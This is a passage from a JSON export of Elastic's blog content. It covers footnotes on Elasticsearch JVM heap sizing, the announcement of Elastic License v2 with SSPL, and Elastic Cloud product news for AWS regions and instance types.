2\u003csup\u003e30\u003c/sup\u003e = 1,073,741,824 bytes, respectively.\u003ca href=\"#ref1\" title=\"Return.\" target=\"_self\"\u003e↩\u003c/a\u003e\u003c/li\u003e\n \u003cli id=\"fn2\"\u003eAn application that makes extensive use of 64-bit numerical types might be slower on a 32-bit JVM because it can not take advantage of 64-bit registers and instructions.\u003ca href=\"#ref2\" title=\"Return.\" target=\"_self\"\u003e↩\u003c/a\u003e\u003c/li\u003e\n \u003cli id=\"fn3\"\u003eAligned objects do lead to a small amount of slop in the heap, but that's okay because \u003ca href=\"https://en.wikipedia.org/wiki/Data_structure_alignment\" target=\"_self\"\u003emodern CPUs prefer 8-byte aligned addresses\u003c/a\u003e.\u003ca href=\"#ref3\" title=\"Return.\" target=\"_self\"\u003e↩\u003c/a\u003e\u003c/li\u003e\n \u003cli id=\"fn4\"\u003eExtra CPU instructions are not free, and the \u003ca href=\"https://hg.openjdk.java.net/jdk8/jdk8/hotspot/file/87ee5ee27509/src/cpu/x86/vm/macroAssembler_x86.cpp#l4986\" target=\"_self\"\u003ebranch\u003c/a\u003e/\u003ca href=\"https://hg.openjdk.java.net/jdk8/jdk8/hotspot/file/87ee5ee27509/src/cpu/x86/vm/macroAssembler_x86.cpp#l4924\" target=\"_self\"\u003epredicated instructions\u003c/a\u003e that arise from decoding/encoding a non-zero based oop can be especially expensive.\u003ca href=\"#ref4\" title=\"Return.\" target=\"_self\"\u003e↩\u003c/a\u003e\u003c/li\u003e\n \u003cli id=\"fn5\"\u003eOn my laptop running OS X 10.11.4 using Oracle JDK 8u74, I can get up to around a 28250 MB heap before the JVM does not use zero-based oops and on my workstation running Fedora 23 using Oracle JDK 8u74, I can get up to around a 30500 MB heap before the JVM does not use zero-based oops.\u003ca href=\"#ref5\" title=\"Return.\" target=\"_self\"\u003e↩\u003c/a\u003e\u003c/li\u003e\n \u003cli id=\"fn6\"\u003eIt is interesting to note that G1 GC was initially proposed as a replacement for the CMS collector but is now being touted as a replacement for the throughput collector.\u003ca href=\"#ref6\" title=\"Return.\" target=\"_self\"\u003e↩\u003c/a\u003e\u003c/li\u003e\n \u003cli id=\"fn7\"\u003eField data and doc values are used for aggregations, sorting and script field access.\u003ca href=\"#ref7\" title=\"Return.\" target=\"_self\"\u003e↩\u003c/a\u003e\u003c/li\u003e\n \u003cli id=\"fn8\"\u003eNorms are an index-time component of relevance scoring; norms can be disabled if you're not using relevance scoring.\u003ca href=\"#ref8\" title=\"Return.\" target=\"_self\"\u003e↩\u003c/a\u003e\u003c/li\u003e\n \u003c/ol\u003e\n\u003c/div\u003e\n\u003chr /\u003e\n\u003cdiv class=\"credits\"\u003e\u003cbr /\u003eThe \u003ca href=\"https://www.flickr.com/photos/neilsingapore/14312966615/in/photolist-nNMGjt-6N7efX-Jbtt-naBAiZ-4ghavr-brKKia-6GbYot-8593Hc-5zGkqm-2DXig8-CD2x7-naBuTS-daZg32-eg6ygg-u52uB-7juEGz-ox83ov-7hnTZS-cuRwPo-5ETGmc-4BVEaB-fwtsNC-85c9gh-5KD6L-95ccc6-apsfR-4A3o2G-uAPyA-8593Ex-e8Z2oi-64qsRF-obNL6N-859qD8-2j766A-4vDEof-5aCChL-adouGz-3RUPXt-6mb5p8-dfK32H-84Dak9-baAoTZ-8593Fc-naBygo-naBNfQ-85c9ed-nQeJRi-4HnPoE-2h3Lnr-k5GE\" target=\"_self\"\u003eimage\u003c/a\u003e associated with this post is licensed under the \u003ca href=\"https://creativecommons.org/licenses/by-nc/2.0/\" target=\"_self\"\u003eCC BY-NC 2.0 license\u003c/a\u003e and is cropped from the original. The full-bleed \u003ca href=\"https://www.flickr.com/photos/53357045@N02/4973028423/in/photolist-8zs56n-948FzN-c4R7P7-8zXKV7-mbWY48-jmkq5s-8cU7bw-5bpNE2-8ZDVEY-mbYBxq-r7AQqz-ffFvJT-9SV3h2-9E4Vvr-8FjQxQ-7ZyiDz-bCijr2-bPTpMB-6WASiP-5bpNBk-besLPa-6GXS1R-dLyno3-cH5zty-affZNN-mbWhS4-qUGhRp-pt5Une-qaXnt8-9E4Mwp-czBdo7-7sXYnJ-kPDXTu-74He2k-jSYdTx-ptRXLf-q3Xi74-dNAXGT-aYrJfz-9KPnBa-417zm9-6y6PTK-ySxQY4-f9V2Jx-ontX16-jrfGhs-5PCJt2-eYk3HF-eYwcpE-gu4BSy\" target=\"_self\"\u003eimage\u003c/a\u003e associated with this post is licensed under the \u003ca href=\"https://creativecommons.org/licenses/by/2.0/\" target=\"_self\"\u003eCC BY 2.0 license\u003c/a\u003e and is cropped from the original.\u003cbr /\u003e\u003c/div\u003e","category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T10:58:13.264Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":{"uid":"blt8c26678302b7519a","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-09T13:16:35.045Z","updated_at":"2018-10-09T13:16:35.045Z","content_type":"image/jpeg","file_size":"110618","filename":"double-trouble-2-husky-dogs-wolves.jpg","title":"double-trouble-2-husky-dogs-wolves.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-03T00:52:23.189Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8c26678302b7519a/5bbcaa3363ed239936a7dc02/double-trouble-2-husky-dogs-wolves.jpg"},"markdown_l10n":"","product":["elasticsearch"],"publish_date":"2016-04-04T18:11:32.000Z","seo":{"seo_title_l10n":"","seo_description_l10n":"","canonical_tag":"","og_markup":{"facebook_profile_id":""},"noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":3,"locale":"en-us","uid":"blta3fd0168b354a680","ACL":{},"created_at":"2023-11-06T21:50:30.740Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elk-elastic-stack","label_l10n":"ELK/Elastic Stack","tags":[],"title":"ELK/Elastic Stack","updated_at":"2024-03-12T21:21:08.589Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-03-12T21:21:14.279Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt0e7c39f65cbd3755","ACL":{},"created_at":"2023-11-06T20:37:20.943Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"data-ingestion","label_l10n":"Data ingestion","tags":[],"title":"Data ingestion","updated_at":"2023-11-06T20:37:20.943Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.173Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt6d95e5a5f26dfd28","ACL":{},"created_at":"2023-11-06T21:30:31.485Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"root-cause-analysis","label_l10n":"Root cause analysis","tags":[],"title":"Root cause analysis","updated_at":"2023-11-06T21:30:31.485Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.345Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt562cfb55338604af","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-09T13:16:22.777Z","updated_at":"2018-10-09T13:16:22.777Z","content_type":"image/jpeg","file_size":"77695","filename":"mine-heaps-720x420.jpg","title":"mine-heaps-720x420.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-03T00:52:23.189Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt562cfb55338604af/5bbcaa26b160bf6a367eb98d/mine-heaps-720x420.jpg"},"title":"A Heap of Trouble: Managing Elasticsearch's Managed Heap","title_l10n":"A Heap of Trouble: Managing Elasticsearch's Managed Heap","updated_at":"2024-09-12T19:49:42.958Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/a-heap-of-trouble","versions":[],"publish_details":{"time":"2024-09-12T19:49:46.910Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_version":17,"locale":"en-us","uid":"blt8023f51c3d3eccad","ACL":{},"abstract_l10n":"","author":["blt4990cfe37610ed0f"],"body_l10n":"\u003cp\u003eWhen we announced our license change for Elasticsearch and Kibana, moving the Apache 2.0-licensed source code to be dual licensed under both the Elastic License and SSPL, we also \u003ca href=\"/blog/license-change-clarification\"\u003ementioned\u003c/a\u003e we would work closely with the community on a simplified and more permissive version of the Elastic License. I am happy to share the results with you.\u003cbr /\u003e\u003cbr /\u003eThe Elastic License is already widely used. More than 90% of our downloads are under the Elastic License, and those users enjoy the significant additional \u003ca href=\"/subscriptions\"\u003evalue provided\u003c/a\u003e under the free and open Basic tier. Thanks to this value, the majority of our users and community are already using the software under the Elastic License, so they viewed our recent license change as a non-event. We are happy to see it, because our intent is to minimize any disruption to our community.\u003cbr /\u003e\u003cbr /\u003eWe took this opportunity to engage with our community and find ways to further simplify the Elastic License. After talking to users who reached out for clarification, we believe this new version will help to significantly address the majority of your\u0026nbsp;concerns while protecting our products from \u003ca href=\"https://twitter.com/kimchy/status/1351534442993446917\"\u003eabuse, misinformation, and confusion\u003c/a\u003e.\u003c/p\u003e\u003ch2\u003eElastic License v2\u003c/h2\u003e\u003cp\u003eThe \u003ca href=\"/licensing/elastic-license\"\u003eElastic License v2 (ELv2)\u003c/a\u003e is a very simple, non-copyleft license, allowing for the right to \"use, copy, distribute, make available, and prepare derivative works of the software” and has only three high-level limitations. You cannot:\u003c/p\u003e\u003col\u003e\u003cli\u003eProvide the products to others as a managed service\u0026nbsp;\u003c/li\u003e\u003cli\u003eCircumvent the license key functionality or remove/obscure features protected by license keys\u0026nbsp;\u003c/li\u003e\u003cli\u003eRemove or obscure any licensing, copyright, or other notices\u003c/li\u003e\u003c/ol\u003e\u003cp\u003eELv2 applies to all of Elasticsearch and Kibana. It covers the distribution as well as the source code of all free and paid features.\u003cbr /\u003e\u003c/p\u003e\u003cp\u003eWe share our source code for both free and paid features in the spirit of openness. Unfortunately, our \u003ca href=\"/blog/dear-search-guard-users-including-amazon-elasticsearch-service-open-distro-and-others\"\u003ecopyrights\u003c/a\u003e and \u003ca href=\"https://twitter.com/kimchy/status/1351534442993446917\"\u003etrademarks\u003c/a\u003e have been abused and misused. Our goal with this updated license is to be as permissive as possible while including a minimum set of protections. I hope these protections make sense. \u003ca href=\"/licensing/elastic-license/faq\"\u003eSee our FAQ\u003c/a\u003e for more information about ELv2.\u003c/p\u003e\u003cp\u003eWe created ELv2 to hopefully allow others to adopt it. This is the license we wished was available in 2015 when we were a small company facing \u003ca href=\"https://twitter.com/kimchy/status/1351534442993446917\"\u003emisinformation\u003c/a\u003e. It incorporates all of our learnings from our experience and others who have made similar changes (\u003ca href=\"https://www.mongodb.com/blog/post/mongodb-now-released-under-the-server-side-public-license\"\u003eMongoDB\u003c/a\u003e, \u003ca href=\"https://www.cockroachlabs.com/docs/v24.2/licensing-faqs.html\" target=\"_self\"\u003eCockroachDB\u003c/a\u003e, \u003ca href=\"https://redislabs.com/blog/redis-labs-modules-license-changes/\"\u003eRedisLabs\u003c/a\u003e, \u003ca href=\"https://blog.timescale.com/blog/building-open-source-business-in-cloud-era-v2/\"\u003eTimescaleDB\u003c/a\u003e, \u003ca href=\"https://www.graylog.org/post/graylog-v4-0-licensing-sspl\"\u003eGraylog\u003c/a\u003e, etc.). Hopefully we helped a little here. There are many companies out there facing a similar decision. I hope that over time, those of us with similar goals can coalesce around a smaller number of licenses and that ELv2 will be a catalyst for that.\u003cbr /\u003e\u003cbr /\u003eIn that spirit, we worked on ELv2 with \u003ca href=\"https://heathermeeker.com/about-me/\"\u003eHeather Meeker\u003c/a\u003e, a lawyer who is well known for helping to draft many OSS licenses, including the Mozilla Public License 2.0, as well as helping a number of organizations build similar-in-spirit licenses like the \u003ca href=\"https://www.confluent.io/confluent-community-license/\"\u003eConfluent Community License\u003c/a\u003e, \u003ca href=\"https://www.mongodb.com/licensing/server-side-public-license/faq\"\u003eSSPL\u003c/a\u003e, and others. We are also reaching out to initiatives like the \u003ca href=\"https://polyformproject.org/\"\u003ePolyform Project\u003c/a\u003e and \u003ca href=\"https://faircode.io\"\u003eFair-code\u003c/a\u003e as additional efforts to raise awareness of this license and look for ways to promote its wider use.\u0026nbsp;\u003c/p\u003e\u003ch2\u003eSSPL remains an option for the source code\u003c/h2\u003e\u003cp\u003eWe added \u003ca href=\"https://www.mongodb.com/licensing/server-side-public-license\"\u003eSSPL\u003c/a\u003e, which is a copyleft license created by \u003ca href=\"https://www.mongodb.com/blog/post/mongodb-now-released-under-the-server-side-public-license\"\u003eMongoDB\u003c/a\u003e, as an option to minimize the effect this license change would have on our users. MongoDB is one of the most popular projects out there, used by millions of developers who are happy with SSPL.\u003cbr /\u003e\u003cbr /\u003eSince we made this announcement, we had many of our users reach out and say that they are thankful we provided this option. Their organizations are already using MongoDB, and this made our license change a non-event for them.\u003cbr /\u003e\u003cbr /\u003eThe SSPL is a licensing option for the source code, as shown below:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd65944c1b54a1e0b/6018987f29a02c49ba1f3e4a/chart-license-update-2021.jpg\" class=\"img-fluid\"/\u003e\u003c/p\u003e\u003cp\u003eAnd to be clear, we are \u003ca href=\"https://writing.kemitchell.com/2021/01/20/Righteous-Expedient-Wrong.html\"\u003estill\u003c/a\u003e not claiming that either SSPL or the Elastic License are OSI-approved licenses.\u003c/p\u003e\u003ch2\u003eStill no impact to our cloud and on-premises customers\u0026nbsp;\u003c/h2\u003e\u003cp\u003eIt is important to repeat: there is no impact to any of our Elastic Cloud or self-managed customers. Our customers already use the default distribution under the Elastic License, and their use is governed by the terms of their subscription agreement, which continues to grant them access to additional features, access to support, and other Elastic commitments (for example, IP infringement indemnification) as before.\u003c/p\u003e\u003ch2\u003eThe path forward\u003c/h2\u003e\u003cp\u003eThese changes, including making the Elastic License more permissive, are intended to help us focus on building great products and investing in our community. This means building more great features, many of which we will provide for free and which will be developed in the open. But our commitment goes beyond the code. These license changes let us focus on what matters: helping you find success with our products.\u003c/p\u003e","category":[{"uid":"bltb79594af7c5b4199","_version":3,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:05.640Z","created_by":"blt3044324473ef223b70bc674c","key":"product","label_l10n":"Product","tags":[],"title":"Product","updated_at":"2024-05-10T13:44:20.209Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.527Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2021-02-01T19:37:18.964Z","created_by":"blt36e890d06c5ec32c","date_localized":null,"disclaimer":[],"full_bleed_image":{"uid":"bltbf74335e81fdbea7","ACL":{},"_version":1,"content_type":"image/png","created_at":"2021-01-13T23:55:05.856Z","created_by":"bltde77f2161b811714","file_size":"39216","filename":"blog-banner-generic-elastic.png","is_dir":false,"parent_uid":null,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-01-14T14:09:24.839Z","user":"blt36e890d06c5ec32c"},"tags":[],"title":"blog-banner-generic-elastic.png","updated_at":"2021-01-13T23:55:05.856Z","updated_by":"bltde77f2161b811714","url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbf74335e81fdbea7/5fff8859e4028c63a64d9be2/blog-banner-generic-elastic.png"},"industry":[],"level":[],"markdown_l10n":"","popular_topics":[],"product":[],"publish_date":"2021-02-02T17:00:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"","seo_description_l10n":"","canonical_tag":"","twitter":{"creator":""},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":""},"noindex":false},"services_events":[],"tags":[],"tags_blog_type":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt8b37b4b3ec0fe838","ACL":{},"created_at":"2020-06-17T03:36:06.107Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2020-06-17T03:36:06.107Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.315Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"_version":2,"is_dir":false,"uid":"blt62f3b89a828cca66","ACL":{},"content_type":"image/png","created_at":"2021-01-13T23:55:05.859Z","created_by":"bltde77f2161b811714","description":"","file_size":"86071","filename":"blog-thumb-generic-elastic-lockup.png","parent_uid":"blta8bbe6455dcfdb35","tags":[],"title":"blog-thumb-generic-elastic-lockup.png","updated_at":"2022-02-11T21:03:58.816Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-24T17:27:15.588Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt62f3b89a828cca66/60009475092adc41f184c868/blog-thumb-generic-elastic-lockup.png"},"title":"Introducing Elastic License v2, simplified and more permissive; SSPL remains an option","title_l10n":"Introducing Elastic License v2, simplified and more permissive; SSPL remains an option","updated_at":"2024-08-14T23:04:16.285Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/elastic-license-v2","use_case":[],"versions":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-14T23:06:18.664Z","user":"blt3044324473ef223b70bc674c"}},{"_version":10,"locale":"en-us","uid":"blt0f4c64a594420645","ACL":{},"abstract_l10n":"Elastic Cloud helps you quickly and easily find information, gain insights, and protect your technology investments across AWS, Google Cloud, and Microsoft Azure.","author":["blt0fec6cb25b84331d"],"body_l10n":"\u003cp\u003eWe’re pleased to announce you can now run Elastic Cloud on Amazon Web Services (AWS) in the Canada (Central) region.\u003cbr\u003e\n\u003c/p\u003e\u003cp\u003eElastic Cloud gives you the power of enterprise search, observability, and security in the Canada (Central) region of AWS. Easily search applications, websites, and workplace content platforms for information. Quickly gain deep insights into your environment by monitoring applications and uptime as well as analyzing centralized logs and metrics. You can also help protect your technology investment by layering endpoint security with security event monitoring.\n\u003c/p\u003e\u003ch2\u003eDeploy your own way\u003c/h2\u003e\u003cp\u003eElastic Cloud gives you the flexibility to run where and how you want. You can choose between our managed service offering — or manage the service yourself. Deploy in the cloud on AWS, Google Cloud, or Microsoft Azure and orchestrate everything with your container of choice.\n\u003c/p\u003e\u003cp\u003eWhen you log in to the Elastic Cloud console, simply select your preferred region and cloud service provider and choose how you want to optimize your deployment based on the compute, memory, or I/O requirements of your specific use case. Once you click “Create deployment,” your Elastic Cloud workload is provisioned in minutes.\n\u003c/p\u003e\u003cp\u003eVisit our \u003ca href=\"https://www.elastic.co/guide/en/cloud/current/index.html?blade=cloud.elastic.co\"\u003edocumentation\u003c/a\u003e to learn more.\n\u003c/p\u003e\u003ch2\u003eElastic Cloud and marketplace integration\n\u003c/h2\u003e\u003cp\u003eIf you’re an AWS customer, you can also subscribe to Elastic Cloud and Elasticsearch Service via the \u003ca href=\"https://aws.amazon.com/marketplace/pp/B01N6YCISK?qid=1571899641796\u0026sr=0-1\u0026ref_=srh_res_product_title\"\u003eAWS Marketplace\u003c/a\u003e. You can select between usage plans, and integrated billing consolidates your Elastic Cloud usage charges into your existing AWS bill. These charges are deductible from your prepaid AWS Enterprise Discount Program agreements.\n\u003c/p\u003e\u003cp\u003eGetting started is easy: Log in to the \u003ca href=\"https://cloud.elastic.co/home\"\u003eElastic Cloud console\u003c/a\u003e or \u003ca href=\"https://www.elastic.co/aws\"\u003esign up for a free 14-day trial\u003c/a\u003e.\n\u003c/p\u003e\u003cp\u003e\u003cbr\u003e\u003c/p\u003e","category":[{"_version":5,"locale":"en-us","uid":"blt0c9f31df4f2a7a2b","ACL":{},"created_at":"2018-08-27T12:32:48.561Z","created_by":"sys_blt57a423112de8a853","key":"company-news","label_l10n":"News","tags":[],"title":"News","updated_at":"2024-05-10T13:44:22.885Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-29T20:00:07.956Z","user":"blt27204bf9f7abb7fd"}}],"created_at":"2020-06-29T05:50:51.295Z","created_by":"bltac080fee37d61d25","date_localized":null,"disclaimer":[],"full_bleed_image":{"uid":"blt0562a245edd6447a","ACL":{},"_version":2,"content_type":"image/png","created_at":"2020-01-10T22:30:08.741Z","created_by":"bltf6ab93733e4e3a73","file_size":"53586","filename":"blog-banner-cloud-aws.png","is_dir":false,"parent_uid":null,"tags":[],"title":"blog-banner-cloud-aws.png","updated_at":"2021-01-12T21:11:00.972Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-01-12T21:11:02.653Z","user":"bltf6ab93733e4e3a73"},"description":"","url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0562a245edd6447a/5ffe10645c57ba54fd67e578/blog-banner-cloud-aws.png"},"industry":[],"level":[],"markdown_l10n":"","newsfeed":["blt7431c38caf6a609d"],"popular_topics":[],"product":["elastic cloud"],"publish_date":"2020-06-30T15:00:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"Elastic Cloud is now available on Amazon Web Services (AWS) in Canada (Central)","seo_description_l10n":"Choose AWS as your provider, select Canada (Central) for your deployment, and you’re on your way to simple, secure management in an instant. Elastic Cloud offers you a managed Elasticsearch and Kibana experience from the creators.","canonical_tag":"","twitter":{"creator":""},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":""},"noindex":false},"services_events":[],"tags":[],"tags_blog_type":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt8b37b4b3ec0fe838","ACL":{},"created_at":"2020-06-17T03:36:06.107Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2020-06-17T03:36:06.107Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.315Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_observability_labs":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"_version":2,"is_dir":false,"uid":"bltfc30a12088d69042","ACL":{},"content_type":"image/png","created_at":"2020-01-10T22:30:08.848Z","created_by":"bltf6ab93733e4e3a73","description":"","file_size":"46517","filename":"blog-thumb-cloud-aws.png","parent_uid":"blta8bbe6455dcfdb35","tags":[],"title":"blog-thumb-cloud-aws.png","updated_at":"2022-02-11T21:03:58.816Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-24T17:27:10.287Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfc30a12088d69042/5ffe1057fee93e550328c4a9/blog-thumb-cloud-aws.png"},"title":"Elastic Cloud is now available on Amazon Web Services (AWS) in Canada (Central)","title_l10n":"Elastic Cloud is now available on Amazon Web Services (AWS) Canada Central","updated_at":"2024-08-14T10:25:54.373Z","updated_by":"blt3e52848e0cb3c394","url":"/blog/elastic-cloud-is-now-available-on-amazon-web-services-in-canada-central","use_case":[],"versions":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:07:33.362Z","user":"blt36e890d06c5ec32c"}},{"_version":21,"locale":"en-us","uid":"blt763f6b653f5ebd67","ACL":{},"abstract_l10n":"Amazon EC2 M5d general purpose and R5d memory-optimized instances are now used Elastic Cloud’s deployment templates, in all supported AWS regions. They offer higher throughput and lower latency.","author":["blt75f021e5d64ed992"],"body_l10n":"\u003cp\u003eToday we’re excited to announce the availability of Amazon EC2 M5d general purpose and R5d memory-optimized instances in all \u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-regions-templates-instances.html#ec-aws_regions\"\u003esupported AWS regions\u003c/a\u003e on Elastic Cloud.\u0026nbsp;\u003cbr\u003e\n\u003c/p\u003e\n\u003cp\u003eM5d instances provide a balance of compute, memory, and networking resources that are well suited for the following workloads:\n\u003c/p\u003e\n\u003cul\u003e\n\t\u003cli\u003eElastic App Search\u003c/li\u003e\n\t\u003cli\u003eElasticsearch coordinating nodes\u003c/li\u003e\n\t\u003cli\u003eElasticsearch CPU-optimized data nodes\u003c/li\u003e\n\t\u003cli\u003eElasticsearch machine learning nodes\u003c/li\u003e\n\t\u003cli\u003eElastic Enterprise Search\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eR5d instances are designed to deliver fast performance when processing large data sets in memory and are great for the following workloads:\n\u003c/p\u003e\n\u003cul\u003e\n\t\u003cli\u003eApplication performance monitoring (APM)\u003c/li\u003e\n\t\u003cli\u003eElasticsearch master nodes\u003c/li\u003e\n\t\u003cli\u003eElasticsearch memory-optimized data nodes\u003c/li\u003e\n\t\u003cli\u003eKibana\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eElastic Cloud offers a number of deployment templates to help simplify hardware selection. Hardware configurations are based on best practices for your workload, such as I/O optimized for search or memory optimized for frequent data aggregations.\u0026nbsp;\n\u003c/p\u003e\n\u003cp\u003e\u003ca 